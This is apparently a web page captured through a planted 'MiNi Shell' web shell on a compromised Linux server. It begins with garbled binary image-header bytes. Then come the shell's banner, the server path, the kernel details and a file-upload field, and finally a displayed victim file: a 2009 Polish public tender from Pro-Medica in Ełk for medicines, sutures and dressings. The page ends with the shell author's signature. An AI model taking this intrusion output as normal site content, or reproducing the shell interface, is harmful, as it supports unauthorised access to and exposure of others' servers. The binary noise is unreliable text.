JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/9230-N-2009.html

<p class="kh_header"><b>Ełk: Przetarg nieograniczony na dostawę leków oraz materiałów opatrunkowych i szewnych</b><br>
<b>Numer ogłoszenia: 9230 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica w Ełku Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę leków oraz materiałów opatrunkowych i szewnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego leków oraz materiałów opatrunkowych i szewnych w asortymencie i ilościach określonych w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia, zwanej w dalszej części SIWZ. Przedmiot zamówienia obejmuje 16 pakietów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium.
2.W rozbiciu na pakiety wadium wynosi:
Pakiet 1 -  100 zł (słownie: sto złotych 00/100)
Pakiet 2 - 20 zł (słownie: dwadzieścia złotych 00/100)
Pakiet 3 - 100 zł ( słownie: sto złotych 00/100)
Pakiet 4 - 250 zł ( słownie: dwieście pięćdziesiąt złotych 00/100)
Pakiet 5 - 300 zł ( słownie: trzysta złotych 00/100)
Pakiet 6 - 10 zł ( słownie:  dziesięć złotych 00/100)
Pakiet 7 - 40 zł ( słownie: czterdzieści złotych 00/100)
Pakiet 8 - 60 zł ( słownie: sześćdziesiąt złotych 00/100)
Pakiet 9 - 800 zł ( słownie: osiemset złotych 00/100)
Pakiet 10 - 600 zł ( słownie: sześćset  złotych 00/100)
Pakiet 11-  300 zł ( słownie: trzysta złotych 00/100)
Pakiet 12 - 300 zł ( słownie: trzysta złotych 00/100)
Pakiet 13 - 3 500 zł ( słownie: trzy tysiące pięćset złotych 00/100)
Pakiet 14 -  6 000 zł ( słownie: sześć tysięcy złotych 00/100)
Pakiet 15 -  80 zł ( słownie: osiemdziesiąt złotych 00/100)
Pakiet 16 - 30 zł ( słownie: trzydzieści złotych 00/100)
3.Wadium wnosi się przed upływem terminu składania ofert. 
4.Należy dołączyć potwierdzenie wpłaty wadium.
5.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm. ).
6.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: BGŻ O/Ełk 74203000451110000001038710 do terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia;
4)nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24.1 i 2 Ustawy.
2.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia/nie spełnia
1.W zakresie warunków wskazanych w § IV ust. 1 pkt. 1) - pkt. 4) ocena spełnienia warunków nastąpi (zgodnie z Rozporządzeniem Prezesa RM z dnia 16 października 2008 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu o udzielenie zamówienia publicznego, jakich możne żądać zamawiający od wykonawcy,  Dz. U. Nr 188 poz. 1155)  na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w § V ust. 1 pkt. 1) - pkt. 5) i pkt 7)-8)
1.W zakresie warunku wskazanego w § IV ust. 1 pkt. 2) ocena spełnienia warunku nastąpi (zgodnie z Rozporządzeniem Prezesa RM z dnia 16 października 2008 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich możne żądać zamawiający od wykonawcy,  Dz. U. Nr 188 poz. 1155) na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w § V ust.1 pkt. 6).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert; 
3)Zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega                   z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert; 
4)Oświadczenie Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;
5)Oświadczenie Wykonawcy, iż nie podlega wykluczeniu z Postępowania, zgodnie   z art. 24.1 i 2 Ustawy.
6)Wykaz wykonanych w okresie ostatnich trzech lat dostaw, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie (min.1 dokument potwierdzający należyte wykonanie dostawy).
7)Zezwolenie lub koncesja na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym.(Dotyczy pakietów 8-16)
8)Oświadczenie, iż  wszystkie  środki  farmaceutyczne będące przedmiotem zamówienia są w Polsce zarejestrowane, posiadają aktualne świadectwa   dopuszczenia  do stosowania - zgodnie z Ustawą Prawo Farmaceutyczne z dnia 26 kwietnia 2007r. (Dz. U. z 2007r. Nr 75, poz. 492 z późniejszymi zmianami) (Dotyczy pakietów 8-16).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro-Medica w Ełku Sp. z o.o.
ul. Baranki 24
19-300 Ełk
pok. 027/A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 10:30, miejsce: Pro-Medica w Ełku Sp. z o.o.
ul. Baranki 24
19-300 Ełk
pok. 504 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 1 -szew niewchłanialny, syntetyczny ( skórny ) poliamidowy I      CPV 33141121-4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 2 - szew niewchłanialny, syntetyczny, polipropylen     CPV 33141121-4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 3 - drut stalowy, nierdzewny, antyewentracyjny      CPV 33141121-4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 4 - Hemostatyki        CPV  33141127-6.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 5  -  Chirurgiczna błona dwustronna    CPV 33141110 - 4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 6 - Opatrunki przezroczyste, jałowe CPV 33141110 - 4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 7 - Opatrunki V  CPV 33141110 - 4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 8 - LEKI  CPV 24400000-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.40.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 9  - ALBUMINY CPV 33141540-7.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.15.40-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 10 - ANTYBIOTYKI     CPV 24431400-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.43.14.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 11 - CYCLOPHOSPHAMIDE   CPV 24452100-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 12 - BICALUTAMIDE   CPV 24452100-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 13  - CAPECITABINE   CPV 24452100-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET 14   - ERLOTINIB   CPV 24452100-8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 14   - ERLOTINIB   CPV 24452100-8.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 15 - SUBSTANCJE RECEPTUROWE   CPV - 24490000-5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET 16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 16 - SPRZĘT APTECZNY   CPV - 33141000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com